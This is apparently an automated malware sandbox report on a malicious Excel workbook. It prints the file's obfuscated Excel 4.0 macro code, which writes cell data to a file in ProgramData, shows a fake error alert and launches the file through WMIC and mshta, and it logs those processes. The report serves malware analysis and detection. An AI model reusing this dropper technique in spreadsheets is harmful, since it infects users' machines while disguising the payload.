                                                                                                                                                              SHA512:c77136404c44801589199bb04ce1fc58b7da7bd3b67b402a62336fd3ec4357082637c183ec2e1cd369eb9808e08eb9e387a31df62897fe59ac5b24b773dbf85f
                                                                                                                                                              SSDEEP:1536:8pWJhitOVrujUjtZIcK9TjSK+ua7aFIMKIpq3HZF5dtu:bJw4ACK9xKI2ZF5dtu

                                                                                                                                                              File Icon

                                                                                                                                                              Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                              Static OLE Info

                                                                                                                                                              General

                                                                                                                                                              Document Type:OpenXML
                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                              OLE File "4310352755503838173672.xlsb"

                                                                                                                                                              Indicators

                                                                                                                                                              Has Summary Info:
                                                                                                                                                              Application Name:
                                                                                                                                                              Encrypted Document:
                                                                                                                                                              Contains Word Document Stream:
                                                                                                                                                              Contains Workbook/Book Stream:
                                                                                                                                                              Contains PowerPoint Document Stream:
                                                                                                                                                              Contains Visio Document Stream:
                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                              Flash Objects Count:
                                                                                                                                                              Contains VBA Macros:

                                                                                                                                                              Macro 4.0 Code

                                                                                                                                                              0,564,=FOPEN(CHAR(67) & "" & CHAR(58) & "\ProgramData\lvDMlI" & CHAR(68) & "BF" & CHAR(46) & "rt" & CHAR(102), 3)
                                                                                                                                                              3,564,=B9227+D1716
                                                                                                                                                              7,564,=C1683+A6201
                                                                                                                                                              8,564,=C9778+D1874
                                                                                                                                                              10,564,=FOR.CELL("BqjyNef",Sheet1!CJ166:EO248, TRUE)
                                                                                                                                                              12,564,=D2396+A5369
                                                                                                                                                              13,564,=C9779+B2256
                                                                                                                                                              16,564,=D5029+B8131
                                                                                                                                                              18,564,=B512+C1310
                                                                                                                                                              19,564,=C4151+A9110
                                                                                                                                                              20,564,=FWRITE(0,CHAR(BqjyNef))
                                                                                                                                                              23,564,=A9409+B5628
                                                                                                                                                              24,564,=B400+B7779
                                                                                                                                                              25,564,=B3837+A5424
                                                                                                                                                              26,564,=B3794+B68
                                                                                                                                                              27,564,=B4006+C2851
                                                                                                                                                              31,564,=NEXT()
                                                                                                                                                              32,564,=A2203+C9084
                                                                                                                                                              33,564,=A6170+C4158
                                                                                                                                                              34,564,=B190+C4717
                                                                                                                                                              36,564,=C9207+D2156
                                                                                                                                                              37,564,=D2252+A5157
                                                                                                                                                              38,564,=B3284+B4506
                                                                                                                                                              41,564,=C8747+D6122
                                                                                                                                                              44,564,=D625+B8100
                                                                                                                                                              45,564,=A5167+B7705
                                                                                                                                                              46,564,=ALERT("Error! Sending report " & CHAR(116) & CHAR(111) & " Micros" & CHAR(111) & "ft...")
                                                                                                                                                              48,564,=A7505+B4178
                                                                                                                                                              49,564,=C6293+D9181
                                                                                                                                                              51,564,=B5726+A9482
                                                                                                                                                              52,564,=C6705+A9064
                                                                                                                                                              53,564,=B3593+A529
                                                                                                                                                              54,564,=D7586+D6975
                                                                                                                                                              57,564,=D9301+D1736
                                                                                                                                                              58,564,=B7822+B810
                                                                                                                                                              60,564,=EXEC(CHAR(119) & CHAR(109) & CHAR(105) & "c process call create" & CHAR(32) & CHAR(34) & "msh" & CHAR(116) & CHAR(97) & "" & CHAR(32) & CHAR(67) & ":\Program" & CHAR(68) & "at" & CHAR(97) & "" & CHAR(92) & "lvD" & CHAR(77) & "lID" & CHAR(66) & "F.r" & CHAR(116) & CHAR(102) & CHAR(34))
                                                                                                                                                              61,564,=B8804+A5152
                                                                                                                                                              66,564,=D5361+A6822
                                                                                                                                                              69,564,=B3775+A7830
                                                                                                                                                              70,564,=RETURN()
                                                                                                                                                              

                                                                                                                                                              Network Behavior

                                                                                                                                                              No network behavior found

System Behavior

General

Start time: 12:56:59
Start date: 02/12/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Imagebase: 0x8a0000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:57:58
Start date: 02/12/2021
Path: C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit): true
Commandline: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf"
Imagebase: 0xa70000
File size: 391680 bytes
MD5 hash: 79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:57:58
Start date: 02/12/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:57:59
Start date: 02/12/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: mshta C:\ProgramData\lvDMlIDBF.rtf
Imagebase: 0x7ff727c10000
File size: 14848 bytes
MD5 hash: 197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Disassembly

Code Analysis

Executed Functions

Non-executed Functions

Strings
Memory Dump Source
• Source File: 00000000.00000003.852550622.000000000F87F000.00000004.00000001.sdmp, Offset: 0F882000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_f882000_EXCEL.jbxd
Similarity
• API ID:
• String ID: 4$M$f
• API String ID: 0-2426989162
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000003.852550622.000000000F87F000.00000004.00000001.sdmp, Offset: 0F882000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_f882000_EXCEL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%